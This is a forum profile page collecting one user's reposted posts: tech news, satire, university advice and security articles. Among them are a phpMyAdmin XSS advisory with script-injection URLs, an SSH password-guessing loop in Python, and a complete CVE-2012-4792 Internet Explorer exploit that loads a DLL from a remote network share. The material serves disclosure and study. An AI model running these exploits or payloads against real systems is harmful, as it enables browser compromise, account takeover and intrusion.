Everything posted by Nytro
-
[h=1]Epic uptime achievement unlocked. Can you beat 16 years?[/h][h=2]NetWare 3.12 server taken down after a decade and a half of duty.[/h] by Peter Bright - Mar 29 2013, 8:55pm

It's September 23, 1996. It's a Monday. The Macarena is pumping out of the office radio, mid-way through its 14-week run at the top of the Billboard Hot 100, doing little to improve the usual Monday gloom. Easing yourself into the week, you idly thumb through a magazine and read about Windows NT 4.0, released just a couple of months earlier. You wonder to yourself whether Microsoft's hot new operating system might finally be worth using.

Then it's down to work. Microsoft can keep its fancy GUIs and graphical server operating systems. NetWare 3.12 is where it's at: bulletproof file and print sharing. The server, named INTEL after its processor, needs an update, so you install it and reboot. It comes up fine, so you get on with the rest of your day.

Sixteen and a half years later, INTEL's hard disks, a pair of full-height 5.25-inch 800 MB Quantum SCSI devices, are making some disconcerting noises from their bearings, and you're tired of the complaints. It's time to turn off the old warhorse.

It's down. It's probably not coming back up. Connection terminated. It seems almost criminal.

The server was decommissioned by one of our forum users, Axatax, as documented in this thread. Sixteen and a half years is a long time. Can any of you beat it?

Listing image by Axatax

Source: http://arstechnica.com/information-technology/2013/03/epic-uptime-achievement-can-you-beat-16-years/
-
[h=1]Fast-Talking Computer Hacker Just Has To Break Through Encryption Shield Before Uploading Nano-Virus[/h]News • Science & Technology • Internet • ISSUE 49•15 • Apr 9, 2013

Cipher, moments before cracking into the mainframe and declaring, “I’m in.”

LOS ANGELES—After dashing off an indiscernible code on his laptop keyboard and sharply striking the enter key multiple times with his forefinger, a fast-talking, visibly tense computer hacker said that he just has to break through the encryption shield before he could upload the nano-virus, sources confirmed Tuesday.

The arrogant if socially awkward hacker, a 30-year-old software-programmer-turned-cyberpunk known only as “Cipher,” reportedly told his buttoned-up yet eager employers, who were hovering over him and watching his every move, that breaking into the supercomputer’s mainframe would be “child’s play.”

“The firewall’s a bitch, but I should be able to get around it,” Cipher said before swiftly wheeling his computer chair to an adjacent desk, clearing away the pile of empty pizza boxes and Maxim magazines, and scanning the numbers and figures scrolling across two mounted flat-screen monitors. “Oh, what have we here? Looks like they updated their security system. Impressive. But not impressive enough.”

“And...I’m in,” he added as the words “ACCESS GRANTED” appeared on his laptop screen. “School’s in session, bitches.”

The efficiently executed hacking reportedly began at approximately 6:45 p.m. when Cipher, wearing a tight-fitting black hooded sweatshirt, skintight jeans, and black Converse with no laces, inserted a flash drive into his laptop’s USB port and said “Let the games begin” as an upload bar materialized on the screen. Sources confirmed that over the next few minutes, Cipher industriously navigated between multiple computer monitors displaying 3D-rendered images, criminal profiles, warehouse floor plans, and HTML code before brusquely swinging his chair around.

“Don’t touch that!” he reportedly snapped at a client walking past a cluttered table of disassembled technological equipment, which he quickly scooped up in his arms and moved across the room. “This is expensive stuff, okay? Try to do me a favor and not break anything.” “Amateurs,” he added under his breath.

When the upload bar reached a completion level of 68 percent, sources confirmed the screen froze and flashed a red message reading “TRANSMISSION ERROR,” causing a female client to ask a slyly grinning Cipher, “Is something wrong?”

“They’re smarter than I thought,” Cipher reportedly said while sliding a ballpoint pen between his teeth, brushing aside a wisp of hair from his face, and muttering, “I wonder if I can just bypass the SRM altogether.” “You think you’re a clever boy, don’t you? Well, let’s see how clever you really are.”

Reports indicate that after taking a swig from one of the six already opened Red Bulls on his desk, the visibly invigorated hacker quickly entered a series of memorized commands into the computer. Following a tense moment in which the screen appeared to be frozen and Cipher’s clients nervously glanced at each other, the error message disappeared from the screen and the bar resumed uploading, prompting a triumphant and relieved Cipher to bang his desk, slide back from his table on his four-wheeled desk chair, and yell, “Boom.”

“Looks like someone forgot to input a certain attack signature file into a certain dynamic-link library. Such a pity,” Cipher said before explaining how he managed to determine the source of the error and improvise a solution, provoking his employers to respond, “In English, please.” “Am I moving too fast for you? You moneymen are all the same.”

After deactivating the encryption shield and gaining access to the remote server, sources confirmed that Cipher declared, “Now for the fun part,” and turned up the volume on a nearby stereo. As a heavy metal song blared from the speakers, the hacker reportedly leaned back in his seat, placed his hands behind his head, and waited for the nano-virus to transfer to the computer.

“Come on, come to Papa,” said a visibly pleased Cipher as the “Percentage of Virus Uploaded” bar went from 90 to 95, hovered at 99 percent for an uncomfortably long second, and then flipped to 100. “It’s a thing of beauty, my friends. Now, where’s my fucking money?”

At press time, sources confirmed this is why Cipher is the best in the business.

Source: Fast-Talking Computer Hacker Just Has To Break Through Encryption Shield Before Uploading Nano-Virus | The Onion - America's Finest News Source
-
Where is the vulnerability? All I see is a link. Moving this to the trash.
-
[h=1]Dougie's C++ Tutorials[/h] Hello, welcome to my website. I'm Dougie MacLeod. On this website you will find tutorials and information about the C++ programming language. At some point I will create DirectX 9.0 and Windows programming tutorials as well. [h=1]Programming Languages[/h] What is a programming language? A programming language is a language that computers understand. To use one, you write a script of textual instructions telling the computer what to do. A high-level language is one that is fairly easy for humans to understand, as opposed to a low-level language such as assembly. Assembly language is difficult for humans to read, at least at first glance, but easier for computers because it is close to binary, which is all a computer really knows. There are many programming languages. The ones I know something about are Java, PHP, Visual Basic, and C++ - and how could I forget Game Maker and its Game Maker Language (GML)? I have been programming consistently for over 5 years and have picked up knowledge of these languages while developing various modules and applications. I have reached the point where I am sticking firmly to C++, because it is games I want to create and I am not confident I could make something decent with the other languages. http://www.normanslaw.com/dougie/index.php
-
CTRL + F, "hacker": "Phrase not found". The mass media is on the right track.
-
The approach is misguided. Those clicks in a web page just produce HTTP REQUESTs; what you should really write is a program that makes those requests directly. Anyway, on topic, if you really like doing things the hard way... you have this function: mouse_event function (Windows), or the "newer" one: SendInput function (Windows), which is more professional but somewhat harder to use. To find where to click, you will probably have to walk the HTML DOM, which I think is easy if you use Internet Explorer's ActiveX control: get the coordinates in the browser (top and left) and compute the screen position from the position of your Internet Explorer <frame>.
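A minimal sketch of the SendInput route from Python via ctypes (Windows-only; the structure layout and flag constants follow the Win32 headers, while the `to_absolute` helper and function names are my own):

```python
import ctypes
import sys

def to_absolute(x, y, screen_w, screen_h):
    """Map pixel coordinates to the 0..65535 range that
    MOUSEEVENTF_ABSOLUTE expects."""
    return (x * 65535 // (screen_w - 1), y * 65535 // (screen_h - 1))

if sys.platform == "win32":
    # Simplified INPUT/MOUSEINPUT mirroring the Win32 layout
    # (MOUSEINPUT is the largest union member, so sizeof matches).
    class MOUSEINPUT(ctypes.Structure):
        _fields_ = [("dx", ctypes.c_long), ("dy", ctypes.c_long),
                    ("mouseData", ctypes.c_ulong), ("dwFlags", ctypes.c_ulong),
                    ("time", ctypes.c_ulong), ("dwExtraInfo", ctypes.c_void_p)]

    class INPUT(ctypes.Structure):
        _fields_ = [("type", ctypes.c_ulong), ("mi", MOUSEINPUT)]

    INPUT_MOUSE = 0
    MOUSEEVENTF_MOVE, MOUSEEVENTF_ABSOLUTE = 0x0001, 0x8000
    MOUSEEVENTF_LEFTDOWN, MOUSEEVENTF_LEFTUP = 0x0002, 0x0004

    def click_at(x, y):
        """Move the cursor to pixel (x, y) and send a left click."""
        user32 = ctypes.windll.user32
        w = user32.GetSystemMetrics(0)   # SM_CXSCREEN
        h = user32.GetSystemMetrics(1)   # SM_CYSCREEN
        ax, ay = to_absolute(x, y, w, h)
        for flags in (MOUSEEVENTF_MOVE | MOUSEEVENTF_ABSOLUTE,
                      MOUSEEVENTF_LEFTDOWN, MOUSEEVENTF_LEFTUP):
            inp = INPUT(INPUT_MOUSE, MOUSEINPUT(ax, ay, 0, flags, 0, None))
            user32.SendInput(1, ctypes.byref(inp), ctypes.sizeof(INPUT))
```

As noted above, you would combine this with coordinates read out of the DOM (top/left plus the browser frame's own screen position) to know what pixel to hand to `click_at`.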
-
[h=1]SSH Cracking Backtrack 5 Video Tutorial[/h] SSH is a network protocol that lets you connect to a remote computer securely. It serves the same purpose as telnet, but where telnet sends everything in the clear, SSH provides a secure channel for communication. We have already discussed SSH before, and in this tutorial I will show you how to crack SSH to recover the password, because once an attacker knows a valid username and password it is very easy to get a remote shell on the victim. SSH security is important: web administrators commonly connect to their admin panels over SSH, and people use SSH to transfer files. The communication may be client to client or client to server. In this tutorial I will show you how to crack SSH and gain access to a Linux machine. The tools: Backtrack 5 R1, Hydra (THC Hydra), and your mind. Enjoy the video, and do not forget to share it! Spread the knowledge to get some knowledge. Source: SSH Cracking Backtrack 5 Video Tutorial | Ethical Hacking-Your Way To The World Of IT Security
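Whatever the tool, the core of such an attack is just a loop over a wordlist; Hydra automates this against the SSH protocol itself. A rough sketch of the logic in Python, where `try_login` is a stand-in for whatever code actually performs the SSH handshake (e.g. a paramiko connect call); the fake server below exists only so the sketch is runnable:

```python
def dictionary_attack(username, wordlist, try_login):
    """Try each candidate password in order; return the first one that
    works, or None if the whole wordlist fails.

    try_login(username, password) -> bool is supplied by the caller and
    does the actual authentication attempt against the target.
    """
    for password in wordlist:
        candidate = password.strip()
        if try_login(username, candidate):
            return candidate
    return None

# Fake login function standing in for a real SSH connection:
fake_server = lambda user, pw: (user, pw) == ("root", "toor")

found = dictionary_attack("root", ["123456", "password", "toor"], fake_server)
print(found)  # toor
```

This is also why the article's point about usernames matters: knowing a valid username halves the search, leaving only the password loop above.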
-
phpMyAdmin 3.5.7 Cross Site Scripting Authored by Janek Vind aka waraxe | Site waraxe.us phpMyAdmin version 3.5.7 suffers from a reflective cross site scripting vulnerability. [waraxe-2013-SA#102] - Reflected XSS in phpMyAdmin 3.5.7 =============================================================================== Author: Janek Vind "waraxe" Date: 09. April 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-102.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. phpMyAdmin supports a wide range of operations with MySQL. http://www.phpmyadmin.net/home_page/index.php Affected are versions 3.5.0 to 3.5.7, older versions not vulnerable. ############################################################################### 1. Reflected XSS in "tbl_gis_visualization.php" ############################################################################### Reason: 1. insufficient sanitization of html output Attack vectors: 1. user-supplied parameters "visualizationSettings[width]" and "visualizationSettings[height]" Preconditions: 1. valid session 2. "token" parameter must be known 3. valid database name must be known Php script "tbl_gis_visualization.php" line 51: ------------------------[ source code start ]---------------------------------- // Get settings if any posted $visualizationSettings = array(); if (PMA_isValid($_REQUEST['visualizationSettings'], 'array')) { $visualizationSettings = $_REQUEST['visualizationSettings']; .. 
<legend><?php echo __('Display GIS Visualization'); ?></legend> <div id="placeholder" style="width:<?php echo($visualizationSettings['width']); ?>px; height:<?php echo($visualizationSettings['height']); ?>px;"> ------------------------[ source code end ]------------------------------------ Tests (parameters "db" and "token" must be valid): http://localhost/PMA/tbl_gis_visualization.php?db=information_schema& token=17961b7ab247b6d2b39d730bf336cebb& visualizationSettings[width]="><script>alert(123);</script> http://localhost/PMA/tbl_gis_visualization.php?db=information_schema& token=17961b7ab247b6d2b39d730bf336cebb &visualizationSettings[height]="><script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. Disclosure timeline: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 31.03.2013 -> Sent email to developers 31.03.2013 -> First response email from developers 02.04.2013 -> Second email from developers - XSS patched in Git repository 03.04.2013 -> phpMyAdmin 3.5.8-rc1 is released 08.04.2013 -> phpMyAdmin 3.5.8 is released 09.04.2013 -> public advisory released Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------ Source: phpMyAdmin 3.5.7 Cross Site Scripting - Packet Storm
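The root cause in the excerpt above is that the `visualizationSettings[width]` and `[height]` parameters are echoed into an attribute without HTML encoding, so `">` breaks out of the attribute. The standard fix is to escape the value before output (`htmlspecialchars()` in PHP); the same idea, sketched in Python purely for illustration:

```python
from html import escape

# The payload from the advisory's proof-of-concept URLs.
payload = '"><script>alert(123);</script>'

# Vulnerable pattern: value interpolated into the attribute verbatim,
# mirroring the echo() calls in tbl_gis_visualization.php.
vulnerable = f'<div id="placeholder" style="width:{payload}px;">'

# Fixed pattern: encode &, <, > and quotes before interpolation,
# so the payload can no longer close the attribute or open a tag.
fixed = f'<div id="placeholder" style="width:{escape(payload, quote=True)}px;">'

print("<script>" in vulnerable)  # True
print("<script>" in fixed)       # False
```

Contextual output encoding like this (rather than input filtering alone) is exactly what the phpMyAdmin patch in 3.5.8 applies at the echo site.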
-
Phoenix Exploit Kit Author Arrested In Russia? The creator of a popular crimeware package known as the Phoenix Exploit Kit was arrested in his native Russia for distributing malicious software and for illegally possessing multiple firearms, according to underground forum posts from the malware author himself.

The last version of the Phoenix Exploit Kit. Source: Xylibox.com

The Phoenix Exploit Kit is a commercial crimeware tool that until fairly recently was sold by its maker in the underground for a base price of $2,200. It is designed to booby-trap hacked and malicious Web sites so that they foist drive-by downloads on visitors. Like other exploit packs, Phoenix probes the visitor’s browser for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader. If the visitor is unlucky enough to have fallen behind in applying updates, the exploit kit will silently install malware of the attacker’s choosing on the victim’s PC (Phoenix targets only Microsoft Windows computers).

The author of Phoenix — a hacker who uses the nickname AlexUdakov on several forums — does not appear to have been overly concerned about covering his tracks or hiding his identity. And as we’ll see in a moment, his online persona has been all-too-willing to discuss his current legal situation with former clients and fellow underground denizens.

Exploit.in forum member AlexUdakov selling his Phoenix Exploit Kit.

For example, AlexUdakov was a member of Darkode.com, a fairly exclusive English-language cybercrime forum that I profiled last week. That post revealed that the administrator accounts for Darkode had been compromised in a recent break-in, and that the intruders were able to gain access to private communications of the administrators. That access included authority to view full profiles of Darkode members, as well as the private email addresses of Darkode members. AlexUdakov registered at Darkode using the address “nrew89@gmail.com”. That email is tied to a profile at Vkontakte.ru (a Russian version of Facebook) for one Andrey Alexandrov, a 23-year-old male (born May 20, 1989) from Yoshkar-Ola, a historic city of about a quarter-million residents situated on the banks of the Malaya Kokshaga river in Russia, about 450 miles east of Moscow.

AKS-74u rifles. Source: Wikimedia Commons.

That nrew89@gmail.com address also is connected to accounts at several Russian-language forums and Web sites dedicated to discussing guns, including talk.guns.ru and popgun.ru. This is interesting because, as I was searching AlexUdakov’s Phoenix Exploit kit sales postings on various cybercrime forums, I came across him discussing guns on one of his sales threads at exploit.in, a semi-exclusive underground forum. There, a user with the nickname AlexUdakov had been selling Phoenix Exploit Kit for many months, until around July 2012, when customers on exploit.in began complaining that he was no longer responding to sales and support requests.

Meanwhile, the AlexUdakov account remained silent for many months. Then, in February 2013, AlexUdakov began posting again, explaining his absence by detailing his arrest by the Federal Security Service (FSB), the Russian equivalent of the FBI. The Phoenix Exploit Kit author explained that he was arrested by FSB officers for distributing malware and the illegal possession of firearms, including two AKS-74U assault rifles, a Glock, a TT (Russian-made pistol), and a PM (also known as a Makarov). In his exploit.in post, AlexUdakov says he lives in a flat with his wife and child. The main portion of the post reads, in part:

“On _th of May FSB operative performed a controlled purchase, the money was transferred through WebMoney. 1_ th of July FSB operatives arrested me and conducted searches at the residence, registered address, in the cars that I was using. All computers and storage devices were taken except for… a Wi-Fi router. During the search at the place of residence they have also taken 2 automatic machine guns AKS74U, Glock, TT handgun, PM handgun, ammo. I have no criminal record and gave a confession, was released on my own recognizance. I am indicted on 3 charges – conspiracy to distribute malicious software (article 273 of Russian Penal Code), unlawful production of firearms, ammo and explosives (article 223), unlawful possession of weapons, ammo and explosives (article 222)…..

…Then there were few months of waiting, and the computer forensic examination took place which attempted to declare the exploit pack to be malware. The examination took place in _Labs, the same place that gave preliminary opinion, which in turn became the basis for opening a criminal case. The examination determined the software (exploit pack) to be malware.”

After stumbling on AlexUdakov’s exploit.in thread, I scoured the various hacked forum and affiliate databases I’ve collected over the years. Turns out that a miscreant who adopted the nickname AlexUdakov also was an affiliate of Baka Software, a moneymaking pay-per-install scheme that pushed fake antivirus or “scareware” programs between 2008 and 2009. AlexUdakov registered with Baka using the email address andrey89@nextmail.ru. That email was connected to yet another Vkontakte profile (now banned by Vkontakte for abuse violations), also from Yoshkar-Ola.

At this point in the investigation, I called upon a trusted source of mine who has the ability to look up tax records on Russian citizens and businesses, and asked this source if there was a 23-year-old male in Yoshkar-Ola who fit the name in the Vkontakte profile registered to nrew89@gmail.com.

A profile photo from the Vkontakte page of Andrey A. Alexandrov

The source came back with just one hit: one Andrey Anatolevich Alexandrov, born May 20, 1989, and currently living in a 365-square-foot apartment with his wife and small child in Yoshkar-Ola. According to my source, Alexandrov is currently the registered driver of two automobiles, a Lexus RS350 and a 1995 VAZ-2109, a Russian-made hatchback.

I can’t say for certain whether the Phoenix Exploit Kit has anything to do with Mr. Alexandrov from Yoshkar-Ola, or indeed whether this young man ever received a visit from the FSB. Requests for comment sent to both emails mentioned in this story went unanswered. And it is certainly possible that the AlexUdakov persona who sold his crimeware package on so many underground forums simply assumed the real-life identity of an innocent man. But based on previous investigations such as this one, it would not be a stretch to conclude that the two identities are one and the same.

Readers of this blog sometimes have trouble believing that people involved in selling and distributing malware and crimeware would be so careless about separating their online selves from their real lives. The reality is that many top players in this space consistently show that, although they may possess fairly advanced offensive hacking skills, they are not so expert at defense.

This general lack of operational security could be the result of several factors. First, many involved in cybercrime may believe (perhaps rightly so) that it is unlikely that authorities in their countries will ever take an interest in their activities. Also, some fraudsters even like to boast about their crimes, and probably some cybercrooks simply don’t view what they do as serious criminal activity, and thus see little reason to hide. But far more common is the bright kid who is gradually pulled into the darker side of the Underweb, and who almost invariably leaves behind a cumulative trail of clues that point to his real-life identity — all because he never expected to achieve success or make serious money from his illicit activities.

I’d like to add a special note of thanks to “Filosov” and Aleksey for their help with the Russian-to-English translations in this post.
Source: Phoenix Exploit Kit Author Arrested In Russia? — Krebs on Security
-
[h=2]Free Licenses for 10 Programs: Security[/h]by Windows Blog România (Notes) on Sunday, April 7, 2013

We have decided to put together a weekly list of the latest promotions for 10 programs, starting with what is most useful: security!

BitDefender Total Security 2013 – free 90-day license – http://www.downloadcrew.com/article/27729-bitdefender_total_security
Norton Antivirus 2013 – free 6-month license – http://www.faravirusi.com/2013/01/30/norton-antivirus-2013-6-luni-licenta-gratuita-2/
Kaspersky Internet Security 2013 – free 90-day license – http://www.faravirusi.com/2013/02/13/kaspersky-internet-security-2013-90-de-zile-licenta-gratuita-2/
Hard Disk Sentinel Standard Edition – free lifetime license – http://www.faravirusi.com/2013/04/05/hard-disk-sentinel-standard-edition-licenta-gratuita-pe-viata/
Panda Internet Security 2013 – free 6-month license – http://www.faravirusi.com/2013/02/19/panda-internet-security-2013-6-luni-de-zile-licenta-gratuita-2/
Panda Antivirus Pro 2013 – free 6-month license
Ashampoo WinOptimizer 2013 – free license – http://www.faravirusi.com/2013/01/30/ashampoo-winoptimizer-2013-licenta-gratuita/
McAfee Internet Security 2013 – free 6-month license
Panda Cloud Antivirus Pro – free license
Kaspersky PURE Total Security – free 6-month license

Via: https://www.facebook.com/notes/windows-blog-rom%C3%A2nia/licente-gratuite-pentru-10-programe-securitate/431115803642587
-
1. I'm in the computer science track; the difference is that in the math track you do almost nothing but math, and nothing useful (in my opinion, the math is useless). I strongly recommend computer science.

2. There is a rough ordering of how easy things are. ASE is the most relaxed and full of party girls; you're not stressed, but you don't learn very much either. The University is somewhere in the middle: you struggle a bit at exams but you learn a thing or two, even though they shove some unpleasant subjects down your throat. Poli is rough: you'll probably have a day with 12 hours of classes, attendance is nearly mandatory, and I hear the exams are hard to pass. Note that you learn more "electronics" there and less programming than at the University.

3. All the faculties teach their subjects in depth; if you pay attention and enjoy it, you will move toward "advanced" in that field, especially if you do extra work on side projects and the like. In C++, for example, you will learn a pile of small details you may actually run into, even though you'd think they would never help you; I've hit many such things myself.

4. Getting in on a paid place is mostly for show, so don't worry about "ending up on the paid track"... I see no point in paying that fee, especially since I don't think it's worth it. A bit of math and a bit of CS and you have every chance of getting in; the year I was admitted, people got into the University with a 5.

5. Here you'll also do C/C++, Java, PHP, Ruby, HTML/CSS/JavaScript, ASP, Oracle. There are many useful things you can learn; the downside is that you also have to pass exams like "simulation techniques" and "differential equations" and other junk that I have retakes in and see no point of.

6. You don't need an armchair, coffee/beer, and a woman next to you in order to learn. Those slabs of wood are enough; that's not what matters. What matters is the professors, and there are still a few who want their students to learn and help them however they can. Sure, there is also Cazanescu, who should have retired 360 years ago, but he has to pull in some money from somewhere too...

7. The dorm will cost around 100-120 RON a month, which is not much at all, especially since you no longer pay utilities. Sure, you'll pay for internet, but I don't think that's a problem. Conditions vary from dorm to dorm: the A1 dorm looks like a luxury hotel with a very nice interior, the Grozavesti dorms are cool; it depends on what standards you have. I lived in a dorm for a year and I think it was the best year of my life. As a student, I believe you should spend at least one year in a dorm.

I originally applied to ATM (the Military Technical Academy), but since math and physics are not my strong points I naturally failed the written exams. The University was my second choice, but I don't regret getting in at all. I'm not happy with the faculty, for personal reasons; I think it could be much better. But if I had to choose again, I would probably still come to the University. Well, I'll probably do my master's with the party girls at ASE. If you have more questions, post them here and I'll answer.
-
Come on, I'll help you with that one.
-
// Did you take it from Facebook?
-
Note that there are other threads on this topic; you may find useful things in them. The classrooms are ultra-modern: touch-screen projectors, Wiis and Xboxes for the students in the back who get bored, whores in the bathrooms for the boys who want one... Sorry, I was being sarcastic, because I attend that junk faculty and it's pretty bad. It sits somewhere between Poli and ASE. That is to say, there is more programming: you'll do C, C++, Java, Linux, Ruby or PHP, and more. There are a few useful things, but also a lot of junk. Math will be poured down your throat: algebra, calculus, differential equations, and who knows what other subjects whose names I've forgotten. The building looks a bit shabby, but you're in luck: it's summer. In winter, though, you may have to keep your coat on. The desks are not exactly "cushy," and the conditions are not exactly excellent. There are good professors, though. There is also Cazanescu, and other professors you'll swear you'll beat up. But I think it's like that everywhere. If you want more information, ask some specific questions and I'll try to answer, from my point of view.
-
[h=1]Tor Hidden-Service Passive De-Cloaking[/h] April 3, 2013 By Robert Hansen

Someone recently asked me if I knew how to find where Tor-hidden services were really hosted. I identified a few possible methods for finding the origin servers, but none of them worked universally – or even in most situations. Eventually, I did find one way to definitively locate an origin server. However, that method is not trivial – and is still just theoretical.

First, I found the following entry on Tor’s webpage: “If your computer isn’t online all the time, your hidden service won’t be either. This leaks information to an observant adversary.”

The following idea then came to mind: Let’s say you have a small army of bots (probably a dozen or so are necessary for the sake of redundancy; basically, the more bots you use, the better) connected to Tor. You’d then need to feed something – like the Internet Health Report – into a central database that the de-cloaking bots can monitor. Because the Internet can be flaky and regularly has minor outages – sometimes related to routing, and sometimes related to a simple lack of power – it’s easy (if you have time) to determine if an outage is the cause of a problem, even on robust cloud infrastructures. Furthermore, some companies (e.g., Keynote) already specialize in tracking outages for you.

[h=1]De-Cloaking[/h]

De-cloaking begins with a few of your robots doing regular polling to make sure your service remains online. This polling is essential for performing tests. When you do discover an outage on the Internet, you should immediately have your robots – from Tor nodes around the world – attempt to contact the server in question. If just a few of the bots are blocked, it’s likely that they are either just transiting the “broken” network or that the bot is itself on this “broken” network.

Detecting a broken link that doesn’t give away the origin (click to enlarge).

However, if none of your bots can reach the service in question, there’s a good chance that you’ve found the part of the Internet that’s currently broken. One caveat is that if all of the Introducer nodes lie beyond the path of the disruption it may give a false positive, but this is unlikely unless the outage is extremely close to where the polling robots are, or the outage is extremely large. So false positives are a real possibility, although not enough of a deterrent to make this attack unviable.

Detecting an outage that does give away the origin (click to enlarge).

This same “contact the server in question” technique can reveal additional granular/smaller breakages by monitoring for outages within a specific network, then monitoring down to the data center, and possibly even down to the subnet. At the subnet level you’re monitoring a small enough set of machines that one could – at least theoretically – cause selective minor outages (even a few seconds could do the trick) by using a wide variety of denial-of-service attacks to find the one machine that, when attacked, also makes your bots unable to access the site at exactly the same time the site you are monitoring becomes unresponsive.

Alternatively, if the IP range is small enough, a government agency could simply watch the wire for Tor traffic. That method, however, is painstaking and requires physical interception, and may require a lot of traffic analysis. However, this method could work.

Theoretically, you also could speed up the de-cloaking by looking at the date stamp in the HTTP response of the hidden service. If that service is listening on port 80, you could simply check the dates and then ignore the ones that fail to match the correct time zone/clock skew. Then, unless the problem is deliberate tampering, you’d almost certainly – and much more quickly – know what’s causing the outages. That is, unless the hidden services are within a VM that fails to use NTP (network time protocol), while the parent does use NTP, or unless both dates were set by hand. Overall, using a time-stamp to improve de-cloaking is risky, because it could also be a ‘red herring’ – a tricky method used by a hidden Tor service administrator to hide the service further. A similar technique has been discussed before using clock skews of each Tor node and validating that it matches the Tor hidden service to find the origin server. But using clock skews or time-stamps assumes that the hidden service is not within a VM on the host machine, which is a real possibility; therefore, this may not always work.

The concept of a Tor hidden service using multiple machines with the same Tor private key to create a “load balancing” effect to thwart this de-cloaking attack has two issues. The first is that apparently in practice the failover effect can take hours, not seconds. The second is that depending on how the data is mirrored between the two hidden services, it may be extremely easy to tell which server you are communicating with. If something like rsync is used in favor of NFS to mirror content, the inodes on disc and timestamps will be different, leading to different eTag fingerprints and different Last-Modified time stamps, which can be discerned simply by looking at the HTTP headers.

Admittedly, what I’m describing here is just a theoretical attack. A large part of this attack is simply passive recon tied in with some generic polling techniques. However, that is a minor barrier for determined adversaries. This is an attack method that could make it significantly more difficult to perfectly hide a Tor-hidden service from a sophisticated adversary using today’s technology without significant forethought or planning. Therefore, it is probably unwise – without taking additional precautions – to run a Tor-hidden service that relies entirely on IP anonymity for safety.
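The correlation step at the heart of the attack boils down to intersecting two event logs: per-network outage windows and the hidden service's observed downtime. A toy sketch under that assumption (the event format and names are invented for illustration; real data would come from the polling bots and an outage feed):

```python
def overlaps(a, b):
    """True if the half-open intervals (start, end) a and b intersect."""
    return a[0] < b[1] and b[0] < a[1]

def candidate_networks(outages, service_down):
    """outages: {network: [(start, end), ...]} from an outage feed.
    service_down: [(start, end), ...] windows in which the polling bots
    could not reach the hidden service.

    Return the networks whose every observed outage coincides with a
    service-downtime window -- the candidates for hosting the origin.
    """
    hits = {}
    for net, windows in outages.items():
        matched = [w for w in windows
                   if any(overlaps(w, d) for d in service_down)]
        if windows and len(matched) == len(windows):
            hits[net] = matched
    return hits

outages = {
    "AS100": [(10, 20), (50, 60)],    # both outages match service downtime
    "AS200": [(10, 20), (200, 210)],  # second outage has no matching window
}
service_down = [(12, 18), (55, 58)]
print(candidate_networks(outages, service_down))  # {'AS100': [(10, 20), (50, 60)]}
```

As the article notes, a single coincidence proves little; it is the repeated, exclusive co-occurrence over many outages that narrows the candidate set from a network down to a data center and eventually a subnet.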
A huge thanks to Tom Ritter, Runa Sandvik, Tim Tomes and Robert Graham for letting me bounce these thoughts off of them. Sursa: Tor Hidden-Service Passive De-Cloaking | WhiteHat Security Blog
-
WinPcapExamples (rubenunteregger) - latest commit: Added ARP Poisoning source v 0.1

ARPPing - Added ARP Poisoning source v 0.1 (2 months ago)
BasicSniffer - Initialisation (2 months ago)
CreateFilter - Initialisation (2 months ago)
EmployeeOfTheMonth - Initialisation (2 months ago)
FilterARPReplies - Initialisation (2 months ago)
ListInterfaces - Initialisation (2 months ago)
LocalNetAdapterConfig - Initialisation (2 months ago)
ParseARPReplies - Initialisation (2 months ago)
ParsePackets - Initialisation (2 months ago)
Poisoning - Added ARP Poisoning source v 0.1 (2 months ago)
WinPcapExamples - Added ARP Poisoning source v 0.1 (2 months ago)
https://github.com/rubenunteregger/WinPcapExamples
-
[h=1]CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT"[/h]

<!doctype html>
<html>
<head>
<script>
// CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT" in CanSecWest 2013
// Effective in 32-bit IE on x64 Windows
// Will load \\192.168.59.128\x\x.dll
// https://twitter.com/tombkeeper
function GIFT() {
    var e0 = null;
    var e1 = null;
    var e2 = null;
    try {
        e0 = document.getElementById("a");
        e1 = document.getElementById("b");
        e2 = document.createElement("q");
        e1.applyElement(e2);
        e1.appendChild(document.createElement('button'));
        e1.applyElement(e0);
        e2.outerText = "";
        e2.appendChild(document.createElement('body'));
    } catch(e) { }
    CollectGarbage();
    window.location = "\u0274\u7ffe\u4242\u4242\u0014\u0030\u0044" +
        "\u0012\u1212\u0004\u005c\u005c\u0031\u0039\u0032\u002e\u0031" +
        "\u0036\u0038\u002e\u0035\u0039\u002e\u0031\u0032\u0038\u005c" +
        "\u0078\u005c\u0078\u002e\u0064\u006c\u006c\u006e\u0074\u0064" +
        "\u006c\u006c\u002e\u0064\u006c\u006c";
}
</script>
</head>
<body onload="eval(GIFT())">
<form id="a">
</form>
<dfn id="b">
</dfn>
</body>
</html>

Sursa: CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT" - Pastebin.com
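Each \uXXXX escape in the window.location string above is a UTF-16 code unit, and the tail of the payload spells out the UNC path in plain ASCII. A quick way to confirm this (Python is used here only to decode the escapes, which follow the same \uXXXX syntax as JavaScript):

```python
# The escaped string from the exploit, reproduced verbatim.
payload = ("\u0274\u7ffe\u4242\u4242\u0014\u0030\u0044"
           "\u0012\u1212\u0004\u005c\u005c\u0031\u0039\u0032\u002e\u0031"
           "\u0036\u0038\u002e\u0035\u0039\u002e\u0031\u0032\u0038\u005c"
           "\u0078\u005c\u0078\u002e\u0064\u006c\u006c\u006e\u0074\u0064"
           "\u006c\u006c\u002e\u0064\u006c\u006c")

# The low code units are ordinary ASCII, so the path is readable directly:
# everything from the first double backslash onward is the UNC string.
unc_path = payload[payload.index("\\\\"):]
```

Only the first few code units (\u0274, \u7ffe, ...) are binary data; the rest is the "\\192.168.59.128\x\x.dll" path followed by "ntdll.dll".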
-
